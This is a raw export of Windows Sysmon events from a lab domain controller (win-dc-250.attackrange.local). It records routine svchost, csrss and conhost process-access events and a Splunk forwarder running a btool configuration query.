13:12:08.580{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003974Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.580{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003973Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003972Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003971Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003970Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003969Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003968Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4328-6000-D600-000000009A01}4924C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003967Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003966Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003965Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4328-6000-D500-000000009A01}48884868C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{08A6967A-4328-6000-D600-000000009A01}4924C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003964Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.578{08A6967A-4328-6000-D600-000000009A01}4924C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{08A6967A-4328-6000-D500-000000009A01}4888C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 10341000x80000000000000003963Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4328-6000-D500-000000009A01}4888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003962Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003961Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003960Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003958Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003957Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003956Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4328-6000-D500-000000009A01}4888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4328-6000-D400-000000009A01}47644760C:\Windows\system32\cmd.exe{08A6967A-4328-6000-D500-000000009A01}4888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.571{08A6967A-4328-6000-D500-000000009A01}4888C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{08A6967A-4328-6000-D400-000000009A01}4764C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000003950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-4328-6000-D400-000000009A01}4764C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:12:08.564{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 